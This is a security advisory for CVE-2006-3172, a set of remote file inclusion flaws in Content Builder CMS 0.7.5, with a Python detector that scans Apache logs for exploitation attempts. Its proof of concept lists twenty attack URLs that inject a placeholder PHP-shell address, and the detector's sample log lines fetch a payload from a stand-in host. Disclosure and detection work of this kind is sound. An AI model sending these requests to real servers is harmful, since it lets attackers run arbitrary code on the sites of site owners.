DEFTCODE

GPG - 2048R/6D378CAF

CVE-2006-3172 – Content-Builder CMS 0.7.5 - Remote Command Execution

Vendor

http://www.content-builder.de/

phpCMS is more than just a content management system: it is also a templating engine and an application framework.

Description

Multiple PHP Remote File Inclusion (RFI) vulnerabilities in Content Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL with a trailing slash (/) character in the

  1. lang_path parameter to
    • (a) cms/plugins/col_man/column.inc.php,
    • (b) cms/plugins/poll/poll.inc.php,
    • (c) cms/plugins/user_managment/usrPortrait.inc.php,
    • (d) cms/plugins/user_managment/user.inc.php,
    • (e) cms/plugins/media_manager/media.inc.php,
    • (f) cms/plugins/events/permanent.eventMonth.inc.php,
    • (g) cms/plugins/events/events.inc.php,
    • (h) cms/plugins/newsletter2/newsletter.inc.php;
  2. path[cb] parameter to
    • (i) modules/guestbook/guestbook.inc.php,
    • (j) modules/shoutbox/shoutBox.php,
    • (k) modules/sitemap/sitemap.inc.php; and the
  3. rel parameter to
    • (l) modules/download/overview.inc.php,
    • (m) modules/download/detailView.inc.php,
    • (n) modules/article/fullarticle.inc.php,
    • (o) modules/article/comments.inc.php,
    • (p) modules/article2/overview.inc.php,
    • (q) modules/article2/fullarticle.inc.php,
    • (r) modules/article2/comments.inc.php,
    • (s) modules/headline/headlineBox.php,
    • (t) modules/headline/showHeadline.inc.php.

Proof of Concept

~ stands for [php-shell-url]

http://example/[cb_path]/cms/plugins/col_man/column.inc.php?lang_path= ~/
http://example/[cb_path]/cms/plugins/poll/poll.inc.php?lang_path= ~/
http://example/[cb_path]/cms/plugins/user_managment/usrPortrait.inc.php?lang_path= ~/
http://example/[cb_path]/cms/plugins/user_managment/user.inc.php?lang_path= ~/
http://example/[cb_path]/cms/plugins/media_manager/media.inc.php?lang_path= ~/
http://example/[cb_path]/cms/plugins/events/permanent.eventMonth.inc.php?lang_path= ~/
http://example/[cb_path]/cms/plugins/events/events.inc.php?lang_path= ~/
http://example/[cb_path]/cms/plugins/newsletter2/newsletter.inc.php?lang_path= ~/
http://example/[cb_path]/modules/guestbook/guestbook.inc.php?path[cb]= ~/
http://example/[cb_path]/modules/shoutbox/shoutBox.php?path[cb]= ~/
http://example/[cb_path]/modules/download/overview.inc.php?rel= ~/
http://example/[cb_path]/modules/download/detailView.inc.php?rel= ~/
http://example/[cb_path]/modules/sitemap/sitemap.inc.php?path[cb]= ~/
http://example/[cb_path]/modules/article/fullarticle.inc.php?rel= ~/
http://example/[cb_path]/modules/article/comments.inc.php?rel= ~/
http://example/[cb_path]/modules/article2/overview.inc.php?rel= ~/
http://example/[cb_path]/modules/article2/fullarticle.inc.php?rel= ~/
http://example/[cb_path]/modules/article2/comments.inc.php?rel= ~/
http://example/[cb_path]/modules/headline/headlineBox.php?rel= ~/
http://example/[cb_path]/modules/headline/showHeadline.inc.php?rel= ~/
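Detecting exploitation attempts of this kind from the server side, as an added example that is not part of the advisory or the vendor's code: the script below scans Apache combined-format access log lines for requests to .php scripts whose lang_path, path[cb] or rel parameter carries a URL or PHP stream wrapper instead of a local path. All log lines, hosts and paths in it are constructed placeholders.

```python
"""Flag CVE-2006-3172-style RFI attempts in Apache access logs (added example)."""
import re
from urllib.parse import parse_qs, urlsplit

# The three include-path parameters named in the advisory.
VULNERABLE_PARAMS = {"lang_path", "path[cb]", "rel"}
# A value that makes include() fetch remote code; only works when allow_url_include is on.
REMOTE_VALUE = re.compile(r"^\s*(https?|ftps?|php|data|expect):", re.IGNORECASE)
# Apache "combined" log prefix: client, identity, user, timestamp, request line, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def find_rfi_attempts(lines):
    """Return (client_ip, script_path, parameter, value) for each suspicious request.

    parse_qs percent-decodes keys and values, so path%5Bcb%5D is matched as path[cb].
    """
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a parseable access-log line
        url = urlsplit(m.group("target"))
        if not url.path.endswith(".php"):
            continue
        for param, values in parse_qs(url.query, keep_blank_values=True).items():
            if param in VULNERABLE_PARAMS:
                for value in values:
                    if REMOTE_VALUE.match(value):
                        hits.append((m.group("ip"), url.path, param, value))
    return hits

# Constructed sample log lines; hosts and paths are placeholders, not real indicators.
SAMPLE_LOG = [
    # Benign: a local language directory, which is what lang_path is meant to carry.
    '203.0.113.5 - - [10/Jun/2006:12:00:01 +0000] "GET /cb/cms/plugins/poll/poll.inc.php?lang_path=de/ HTTP/1.1" 200 512',
    # RFI attempt against lang_path, with the trailing slash described in the advisory.
    '198.51.100.7 - - [10/Jun/2006:12:00:02 +0000] "GET /cb/cms/plugins/poll/poll.inc.php?lang_path=http://198.51.100.9/s.txt/ HTTP/1.1" 200 88',
    # Same attempt against path[cb], with brackets and the URL percent-encoded by the client.
    '198.51.100.8 - - [10/Jun/2006:12:00:03 +0000] "GET /cb/modules/guestbook/guestbook.inc.php?path%5Bcb%5D=http%3A%2F%2F198.51.100.9%2Fs.txt%2F HTTP/1.1" 200 88',
    # A URL in an unrelated parameter ("ref", not "rel") is not an include sink and is ignored.
    '203.0.113.6 - - [10/Jun/2006:12:00:04 +0000] "GET /cb/index.php?ref=http://partner.example/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, script, param, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{ip} -> {script} [{param}={value}]")
```

The match on parameter name rather than on the URL path keeps the rule usable if the same include pattern exists in scripts the advisory does not list.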

References